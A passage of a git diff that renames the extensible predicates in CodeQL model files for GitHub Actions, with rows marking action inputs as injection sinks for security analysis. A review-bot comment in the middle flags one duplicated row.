@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395c..e4961ae5ed63 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30ea..19cce83c691d 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155ed..f838eeed0eb8 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f4..48e5b05128f8 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 761776358994..448997b3136e 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a2..13af446f37d1 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd17667..39e1c9ef6240 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml 
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc503..a442ed5cd531 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b5..a22fce01c453 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22d..74a5c7d592c7 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] 
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a15..e78dfb3b073d 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c38..29dac5cffeaa 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad95..f2331633485c 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc42..e492f6012788 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3a..a821b049232a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764ff..4f9f887caf1f 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7a..365f3ac98f88 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml 
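Review bot: The `khan_pull-request-comment-trigger.model.yml` hunk keeps two identical data rows, `["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]` appearing twice, so the rename to `actionsSourceModel` carries the duplicate forward. Duplicate rows in an extensible-predicate table add nothing to the model and can produce repeated source results in query output, so one of the two should be dropped. If the second row was meant to model a different output of that action, it should name that output instead.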
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a5..f42e84655338 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624e..e21b52241667 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c1..6c4a5931b98f 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd64..c7e89697afb6 100644 
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d4..aa8496038365 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588bf..ae869b6b5313 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0a..9f5801b79c04 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8ef..a4a473b8efd2 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a0..10a03e4d1863 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d0..9af82b985f31 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5c..3b779d0b86d8 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fca..6ad087730e41 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde969..fa9c19583524 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] 
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc9147..6bfaffb2bbab 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72d..03fa8beaf0b3 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 8b2b4e79afa5..a4ccaac2d2e0 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf68556..7c32705dde54 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml 
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db74..902483f43997 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80db..be86a330b97e 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b6..0a6f7c347226 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627f..613b3e0fc59f 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af28..489d47ac71e9 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1b..4a98ecd4af16 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c99881..57dc40ef6b8b 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5f..3b92f667ae90 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da6581..da8b02312ea0 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fdf..c06d13301d27 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a4..61935c36f7d6 100644 
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814d..89f61cedc422 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec2..1aabfc23fc4b 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbba..d55fdbc3ea98 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92fb..d01ac86d3178 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e25..bab76cbe27ff 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec50..02ac5032c797 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b7..0c484d44549b 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2f..c088c7a644eb 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 